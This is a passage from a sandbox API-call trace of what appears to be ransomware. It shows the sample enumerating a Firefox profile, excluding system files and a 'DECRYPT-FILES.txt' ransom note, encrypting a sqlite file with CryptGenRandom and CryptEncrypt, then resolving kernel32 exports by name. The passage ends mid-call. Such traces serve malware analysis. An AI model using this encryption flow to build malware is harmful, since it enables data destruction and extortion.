(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0081.213] CloseHandle (hObject=0x0) returned 0 [0081.213] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.213] FindNextFileW (in: hFindFile=0x5f8e58, lpFindFileData=0x3f2daf4 | out: lpFindFileData=0x3f2daf4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac989f40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac989f40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac989f40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0081.213] FindClose (in: hFindFile=0x5f8e58 | out: hFindFile=0x5f8e58) returned 1 [0081.213] CloseHandle (hObject=0x478) returned 1 [0081.214] FindNextFileW (in: hFindFile=0x5f8e18, lpFindFileData=0x3f2dd70 | out: lpFindFileData=0x3f2dd70*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb81a92d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa0000, dwReserved0=0x0, dwReserved1=0x0, cFileName="818200132aebmoouht.sqlite", cAlternateFileName="818200~1.SQL")) returned 1 [0081.214] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="DECRYPT-FILES.txt") returned -1 [0081.214] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="autorun.inf") returned -1 [0081.214] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="boot.ini") returned -1 [0081.214] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="desktop.ini") returned -1 [0081.214] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="ntuser.dat") returned -1 [0081.214] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="iconcache.db") returned -1 [0081.214] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="bootsect.bak") returned -1 [0081.214] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="ntuser.dat.log") returned -1 [0081.214] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="thumbs.db") returned -1 [0081.214] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="Bootfont.bin") returned -1 [0081.214] lstrlenW (lpString="818200132aebmoouht.sqlite") returned 25 [0081.214] lstrcmpiW (lpString1="sqlite", lpString2="lnk") returned 1 [0081.214] lstrcmpiW (lpString1="sqlite", lpString2="exe") returned 1 [0081.214] lstrcmpiW (lpString1="sqlite", lpString2="sys") returned -1 [0081.214] lstrcmpiW (lpString1="sqlite", lpString2="dll") returned 1 [0081.214] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0081.214] lstrlenW (lpString="818200132aebmoouht.sqlite") returned 25 [0081.214] lstrcpyW (in: lpString1=0x3f2d540, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0081.214] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" [0081.214] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.214] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x478 [0081.216] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x3f2cd08 | out: lpFileSize=0x3f2cd08*=655360) returned 1 [0081.216] CreateFileMappingW (hFile=0x478, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x47c [0081.216] MapViewOfFile (hFileMappingObject=0x47c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x37e0000 [0081.239] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0081.239] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0081.239] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0081.243] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2cc70*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2cc70*=0x100) returned 1 [0081.243] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.368] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.369] UnmapViewOfFile (lpBaseAddress=0x37e0000) returned 1 [0081.375] CloseHandle (hObject=0x47c) returned 1 [0081.375] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.375] WriteFile (in: hFile=0x478, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2cc90, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2cc90*=0x108, lpOverlapped=0x0) returned 1 [0081.376] CloseHandle (hObject=0x0) returned 0 [0081.376] CloseHandle (hObject=0x478) returned 1 [0081.376] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.376] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.377] GetTickCount () returned 0x114cd2f [0081.377] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.377] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0081.377] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0081.377] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.377] lstrlenA (lpString="kernel32.dll") returned 12 [0081.378] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0081.378] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0081.378] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0081.378] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0081.378] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0081.378] lstrcpyA (in: lpString1=0x3f2c088, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0081.378] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0081.378] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0081.378] lstrlenA (lpString="ADDATOMA") returned 8 [0081.378] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0081.378] lstrlenA (lpString="ADDATOMW") returned 8 [0081.378] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0081.378] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0081.378] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0081.378] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0081.378] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0081.378] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0081.378] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0081.378] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0081.378] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0081.378] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0081.378] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0081.378] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0081.378] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0081.379] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0081.379] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0081.379] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0081.379] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0081.379] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0081.379] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0081.379] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0081.379] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0081.379] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0081.379] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0081.379] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0081.379] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0081.379] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0081.379] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0081.379] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0081.379] lstrcpyA (in: lpString1=0x3f2c088, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0081.379] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0081.379] lstrcpyA (in: lpString1=0x3f2c088, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0081.379] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0081.379] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0081.379] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0081.379] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0081.379] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0081.379] lstrcpyA (in: lpString1=0x3f2c088, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0081.379] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0081.379] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0081.379] lstrlenA (lpString="BACKUPREAD") returned 10 [0081.379] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0081.379] lstrlenA (lpString="BACKUPSEEK") returned 10 [0081.379] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0081.379] lstrlenA (lpString="BACKUPWRITE") returned 11 [0081.379] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0081.379] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0081.379] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0081.379] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0081.379] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0081.380] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0081.380] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0081.380] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0081.380] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0081.380] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0081.380] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0081.380] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0081.380] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0081.380] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0081.380] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0081.380] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0081.380] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0081.380] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0081.380] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0081.380] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0081.380] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0081.380] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0081.380] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0081.380] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0081.380] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0081.380] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0081.380] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0081.380] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0081.380] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0081.380] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0081.380] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0081.380] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0081.380] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0081.380] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0081.380] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0081.380] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0081.380] lstrcpyA (in: lpString1=0x3f2c088, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0081.380] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0081.380] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0081.380] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0081.381] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0081.381] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0081.381] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0081.381] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0081.381] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0081.381] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0081.381] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0081.381] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0081.381] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0081.381] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0081.381] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0081.381] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0081.381] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0081.381] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0081.381] lstrcpyA (in: lpString1=0x3f2c088, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0081.381] lstrlenA (lpString="BEEP") returned 4 [0081.381] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0081.381] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0081.381] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0081.381] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0081.381] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0081.381] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0081.381] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0081.381] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0081.381] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0081.381] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0081.381] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0081.381] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0081.381] lstrcpyA (in: lpString1=0x3f2c088, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0081.381] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0081.381] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0081.382] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0081.382] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0081.382] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0081.382] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0081.382] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0081.382] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0081.382] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0081.382] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0081.382] lstrlenA (lpString="CANCELIO") returned 8 [0081.382] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0081.382] lstrlenA (lpString="CANCELIOEX") returned 10 [0081.382] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0081.382] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0081.382] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0081.382] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0081.382] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0081.382] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0081.382] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0081.382] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0081.382] lstrcpyA (in: lpString1=0x3f2c088, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0081.382] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0081.382] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0081.382] lstrlenA (lpString="CHECKELEVATION") returned 14 [0081.382] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0081.382] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0081.382] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0081.382] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0081.382] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0081.383] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0081.383] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0081.383] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0081.383] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0081.383] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0081.383] lstrcpyA (in: lpString1=0x3f2c088, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0081.383] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0081.383] lstrcpyA (in: lpString1=0x3f2c088, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0081.383] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0081.383] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0081.383] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0081.383] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0081.383] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0081.383] lstrcpyA (in: lpString1=0x3f2c088, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0081.383] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0081.383] lstrcpyA (in: lpString1=0x3f2c088, 